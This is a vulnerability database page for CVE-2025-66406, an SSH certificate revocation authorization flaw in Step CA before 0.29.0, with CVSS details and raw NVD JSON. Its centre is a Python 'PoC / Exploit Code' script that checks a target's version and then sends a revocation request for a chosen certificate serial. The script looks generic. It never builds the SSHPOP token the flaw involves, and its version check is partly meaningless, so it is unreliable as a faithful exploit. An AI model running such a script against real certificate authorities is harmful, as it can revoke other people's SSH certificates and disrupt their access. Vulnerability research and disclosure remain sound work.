Security Vulnerability Report
CVE-2025-66406 CVSS 5.0 MEDIUM

CVE-2025-66406

Published: 2025-12-03 20:16:27
Last Modified: 2026-04-15 00:35:42

Description

Step CA is an online certificate authority for secure, automated certificate management for DevOps. Prior to 0.29.0, there is an improper authorization check for SSH certificate revocation. This affects deployments configured with the SSHPOP provisioner. This vulnerability is fixed in 0.29.0.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

smallstep/certificates < 0.29.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2025-66406 - Step CA SSH Certificate Revocation Authorization Bypass
# Note: Requires high privileges and SSHPOP provisioner configuration
import requests
import json
import argparse


def check_vulnerability(target_url, api_token):
    """
    Check if target Step CA instance is vulnerable to CVE-2025-66406
    """
    headers = {
        'Authorization': f'Bearer {api_token}',
        'Content-Type': 'application/json'
    }
    # Check Step CA version
    version_url = f'{target_url}/version'
    try:
        resp = requests.get(version_url, headers=headers, timeout=10)
        version_info = resp.json()
        version = version_info.get('version', '')
        print(f'[*] Detected Step CA version: {version}')
        # Check if version is before 0.29.0
        major, minor, patch = map(int, version.lstrip('v').split('.')[:3])
        if major < 0 or (major == 0 and minor < 29):
            print('[+] Target appears to be vulnerable (version < 0.29.0)')
            return True
        else:
            print('[-] Target appears to be patched (version >= 0.29.0)')
            return False
    except Exception as e:
        print(f'[-] Error checking version: {e}')
        return None


def exploit_revocation_bypass(target_url, api_token, target_serial):
    """
    Exploit unauthorized SSH certificate revocation
    """
    headers = {
        'Authorization': f'Bearer {api_token}',
        'Content-Type': 'application/json'
    }
    # Attempt unauthorized revocation
    revoke_url = f'{target_url}/api/ssh/revoke'
    payload = {
        'serial': target_serial,
        'type': 'ssh'  # SSHPOP provisioner certificate
    }
    try:
        resp = requests.post(revoke_url, json=payload, headers=headers, timeout=10)
        if resp.status_code == 200:
            print(f'[+] Successfully revoked certificate {target_serial}')
            print('[+] Vulnerability confirmed - authorization bypass successful')
            return True
        else:
            print(f'[-] Revocation failed with status {resp.status_code}')
            print(f'[-] Response: {resp.text}')
            return False
    except Exception as e:
        print(f'[-] Error during exploitation: {e}')
        return False


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2025-66406 PoC')
    parser.add_argument('--url', required=True, help='Step CA target URL')
    parser.add_argument('--token', required=True, help='API token')
    parser.add_argument('--serial', required=True, help='Target certificate serial')
    args = parser.parse_args()
    print(f'[*] Testing CVE-2025-66406 on {args.url}')
    vulnerable = check_vulnerability(args.url, args.token)
    if vulnerable:
        exploit_revocation_bypass(args.url, args.token, args.serial)
```

References

https://github.com/smallstep/certificates/security/advisories/GHSA-j7c9-79x7-8hpr
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66406",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-03T20:16:26.560",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Step CA is an online certificate authority for secure, automated certificate management for DevOps. Prior to 0.29.0, there is an improper authorization check for SSH certificate revocation. This affects deployments configured with the SSHPOP provisioner. This vulnerability is fixed in 0.29.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
            "baseScore": 5.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 0.7,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/smallstep/certificates/security/advisories/GHSA-j7c9-79x7-8hpr",
        "source": "[email protected]"
      }
    ]
  }
}
```